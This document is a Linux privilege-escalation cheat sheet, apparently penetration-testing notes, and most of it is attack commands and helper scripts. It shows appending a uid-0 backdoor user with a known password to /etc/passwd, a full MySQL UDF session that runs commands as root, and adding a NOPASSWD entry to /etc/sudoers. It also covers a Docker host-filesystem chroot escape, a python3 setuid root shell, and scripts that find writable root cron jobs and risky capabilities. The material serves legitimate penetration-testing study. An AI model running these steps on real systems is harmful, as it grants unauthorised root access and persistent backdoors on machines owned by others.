# Linux Privilege Escalation

### Add a root-privileged user to /etc/passwd

```
openssl passwd -1 -salt gerh pass123
# Output is an MD5-crypt hash: $1$gerh$.X4NnMSmCMib61zDEDWTn0

# Prepend the username (here spartan) to the hash and finish with :0:0:root:/root:/bin/bash;
# uid 0 and gid 0 are what make the account root. Only works if /etc/passwd is writable by you.
echo 'spartan:$1$gerh$.X4NnMSmCMib61zDEDWTn0:0:0:root:/root:/bin/bash' >> /etc/passwd

su spartan
# password: pass123
```
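The same steps as a small POSIX shell script, added here as an example and not part of the original notes: it builds the entry, refuses to append unless the target file is actually writable and the name is free, and reads the uid back before you try `su`. The hash generation mirrors the notes (`openssl passwd -1` with a fixed salt, so the openssl CLI is assumed); the function names and the optional file argument are my own.

```sh
#!/bin/sh
# Added example, not part of the original notes: build the root-equivalent
# /etc/passwd entry from a username and an MD5-crypt hash, and append it
# only after confirming the target file is writable and the name is free.
# Hash generation mirrors the notes (openssl passwd -1, fixed salt);
# function names and the optional file argument are my own.

# Produce the hash exactly as the notes do: $1$<salt>$<md5crypt>.
# Assumes the openssl CLI is installed on the box.
make_hash() {
    openssl passwd -1 -salt "$2" "$1"
}

# Assemble name:hash:uid:gid:gecos:home:shell with uid and gid 0.
# The uid is what makes the account root; the name is irrelevant.
build_passwd_line() {
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$1" "$2"
}

# Append the entry to a passwd file (default /etc/passwd).
# Returns 0 on success, 1 if the file is not writable by us, 2 if the
# username already exists (a duplicate line would not give us the new hash).
add_root_user() {
    user="$1"; hash="$2"; file="${3:-/etc/passwd}"
    [ -w "$file" ] || return 1
    if grep -q "^$user:" "$file" 2>/dev/null; then
        return 2
    fi
    build_passwd_line "$user" "$hash" >> "$file"
}

# Read back the uid of a user from a passwd file, to confirm the entry
# parses as uid 0 before trying "su <user>".
uid_of() {
    awk -F: -v u="$1" '$1 == u { print $3 }' "$2"
}
```

On the target: `add_root_user spartan "$(make_hash pass123 gerh)"` followed by `su spartan`. The writable check is the real gate: on a sane install `/etc/passwd` is root-owned 0644 and this technique does not apply, so `ls -l /etc/passwd` first.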

### Reference for SUID binaries

Enumerate them with `find / -perm -4000 -type f 2>/dev/null`, then look the binary in question up on GTFOBins, which collects write-ups on abusing each one:

{% embed url="<https://gtfobins.github.io>" %}

### Identify the Linux distribution

```
cat /etc/*-release
cat /etc/issue
```

### Find directories where you can drop files

```
find . -writable 2>/dev/null            # writable paths below the current directory
find / -writable -type d 2>/dev/null    # writable directories anywhere on the system
```

### Technique using a MySQL instance that runs as root (UDF)

{% embed url="<https://ejtaal.net/infosec/lordoftheroot/index.html>" %}

The session below compiles the classic `raptor_udf2.c` UDF (which exposes `system()` as a MySQL function; its source is not reproduced here), copies it into the server's library directory through `load_file` / `into dumpfile`, and registers it with `create function`. Two things to check first on a target: the `.so` has to land in the directory the server loads plugins from (`select @@plugin_dir;`; `/usr/lib/` is right only for old installs), and `secure_file_priv` must allow `load_file` and `into dumpfile` for those paths (`select @@secure_file_priv;`: empty means unrestricted, NULL means file access is disabled). Commands run as whichever user `mysqld` runs as, which is why this only yields root when the service is misconfigured to run as root. The large integer returned by `do_system` is not a status code; confirm the command ran by reading `/tmp/out`.

```
[j0hn@timeclock ~]$ gcc -g -c raptor_udf2.c 
[j0hn@timeclock ~]$ gcc -g -shared -o raptor_udf2.so raptor_udf2.o -lc
[j0hn@timeclock ~]$ ls -la /home/j0hn/raptor_udf2.*
-rw-rw-r-- 1 j0hn j0hn 3314 Feb  7 22:08 /home/j0hn/raptor_udf2.c
-rw-rw-r-- 1 j0hn j0hn 3144 Feb  7 22:08 /home/j0hn/raptor_udf2.o
-rwxrwxr-x 1 j0hn j0hn 6029 Feb  7 22:08 /home/j0hn/raptor_udf2.so


mysql> use mysql;
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.03 sec)

mysql> insert into foo values(load_file('/home/j0hn/raptor_udf2.so'));
Query OK, 1 row affected (0.00 sec)

mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
Query OK, 1 row affected (0.00 sec)

mysql> create function do_system returns integer soname 'raptor_udf2.so';
Query OK, 0 rows affected, 1 warning (0.00 sec)
mysql> select * from mysql.func;
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system |   2 | raptor_udf2.so | function | 
+-----------+-----+----------------+----------+
1 row in set (0.00 sec)

mysql> select do_system('id > /tmp/out;');
+-----------------------------+
| do_system('id > /tmp/out;') |
+-----------------------------+
|                  4294967296 | 
+-----------------------------+
1 row in set (0.00 sec)

mysql> select do_system('id > /tmp/out; chmod 777 /tmp/out');
+------------------------------------------------+
| do_system('id > /tmp/out; chmod 777 /tmp/out') |
+------------------------------------------------+
|                                     4294967296 | 
+------------------------------------------------+
1 row in set (0.00 sec)

mysql> exit
```

### Final escalation via /etc/sudoers

```
[j0hn@timeclock ~]$ mysql -u root 
mysql> select do_system('echo "j0hn ALL =(ALL) NOPASSWD: ALL">> /etc/sudoers');
+------------------------------------------------------------------+
| do_system('echo "j0hn ALL =(ALL) NOPASSWD: ALL">> /etc/sudoers') |
+------------------------------------------------------------------+
|                                                       4294967296 | 
+------------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> exit
Bye
[j0hn@timeclock ~]$ sudo bash
[root@timeclock ~]# cd /root
[root@timeclock root]# ls -la

```

### Escalation via Docker

Being able to talk to the Docker daemon (membership in the `docker` group, or write access to `/var/run/docker.sock`) is root-equivalent: mount the host's root filesystem into a container and chroot into it.

```
docker images                                      # pick a locally available image, e.g. alpine
docker run -it -v /:/mnt alpine chroot /mnt bash   # bash comes from the host filesystem, so the image needs none
```

### Reviewing cron jobs

Read `/etc/crontab`, `/etc/cron.d/*`, the `/etc/cron.{hourly,daily,weekly,monthly}` directories and `crontab -l`, and look for jobs run by root whose script (or the directory it lives in) you can write to. crontab.guru decodes the schedule fields:

{% embed url="<https://crontab.guru/#>" %}
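A small POSIX shell helper, added here as an example and not part of the original notes, that does that review mechanically: it parses the seven-field system crontab format (`min hour dom mon dow user command`, plus `@reboot`-style shortcuts) and reports jobs whose program you can overwrite, or which point at a missing file in a directory you can write to. Function names and the sample crontab in the test are mine.

```sh
#!/bin/sh
# Added example, not part of the original notes: list the jobs in a
# crontab-format file and report the ones whose program we can tamper
# with. Parses the seven-field system format used by /etc/crontab and
# /etc/cron.d/* (min hour dom mon dow user command) plus @reboot-style
# shortcuts. Function names are mine.

# Print "user<TAB>command" for every job line, skipping comments, blank
# lines and VAR=value assignments.
cron_jobs() {
    awk '
    /^[ \t]*#/ || /^[ \t]*$/ || /^[A-Za-z_][A-Za-z0-9_]*=/ { next }
    {
        if ($1 ~ /^@/) { user = $2; start = 3 } else { user = $6; start = 7 }
        if (NF < start) next
        cmd = ""
        for (i = start; i <= NF; i++) cmd = cmd (i > start ? " " : "") $i
        print user "\t" cmd
    }' "$1"
}

# For each job, take the program (first word of the command) and report
# it if we can overwrite it, or if it is missing from a directory we can
# write to (so we could create it). Output: "user program reason".
# Relative program names are skipped: resolving them needs cron's PATH.
writable_cron_targets() {
    cron_jobs "$1" | while read -r user cmd; do
        prog="${cmd%% *}"
        case "$prog" in
            /*) ;;
            *) continue ;;
        esac
        if [ -w "$prog" ]; then
            printf '%s %s writable-file\n' "$user" "$prog"
        elif [ ! -e "$prog" ] && [ -w "$(dirname "$prog")" ]; then
            printf '%s %s missing-in-writable-dir\n' "$user" "$prog"
        fi
    done
}

# Where to look on a real box: the system crontab, the drop-in
# directory and the current user's own table.
cron_sources() {
    cat /etc/crontab /etc/cron.d/* 2>/dev/null
    crontab -l 2>/dev/null
}
```

Run `writable_cron_targets /etc/crontab` and repeat for each file in `/etc/cron.d/`; a `root ... writable-file` hit means the next run executes whatever you put in that script.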

### Capabilities

```
getcap -r / 2>/dev/null
```
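The raw `getcap -r /` listing is mostly noise (`cap_net_raw` on `ping` and the like). The helper below, added here as an example and not part of the original notes, filters it down to capabilities that commonly lead straight to root; it understands both getcap output styles (`path = caps+ep` from older libcap, `path caps=ep` from newer). The capability list, the function names and the sample lines in the test are mine.

```sh
#!/bin/sh
# Added example, not part of the original notes: run the getcap sweep from
# the notes and keep only binaries carrying a capability that commonly
# leads straight to root. Both getcap output styles are handled; the list
# of capabilities and the function names are mine.

# Capabilities worth chasing first (GTFOBins has a "Capabilities" entry
# for the binaries that turn these into a root shell or a root file read).
DANGEROUS_CAPS='cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_sys_admin cap_sys_ptrace cap_sys_module cap_chown cap_fowner'

# Read getcap output on stdin and print "path capability" for every
# dangerous capability found. Accepts both formats:
#   older libcap:  /usr/bin/ping = cap_net_raw+ep
#   newer libcap:  /usr/bin/ping cap_net_raw=ep
flag_dangerous_caps() {
    awk -v want="$DANGEROUS_CAPS" '
    BEGIN { n = split(want, w, " "); for (i = 1; i <= n; i++) bad[w[i]] = 1 }
    NF >= 2 {
        path = $1
        caps = ($2 == "=") ? $3 : $2
        sub(/[=+][eip]*$/, "", caps)        # drop the effective/permitted/inheritable flag letters
        m = split(caps, c, ",")
        for (i = 1; i <= m; i++) if (c[i] in bad) print path, c[i]
    }'
}

# Whole-system sweep, as in the notes, filtered down to what matters.
scan_caps() {
    getcap -r / 2>/dev/null | flag_dangerous_caps
}
```

A hit such as `/usr/bin/python3 cap_setuid` is as good as a SUID-root interpreter: `python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'`, and `cap_dac_read_search` on an archiver or reader lets you pull `/etc/shadow` and root's keys without a shell.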

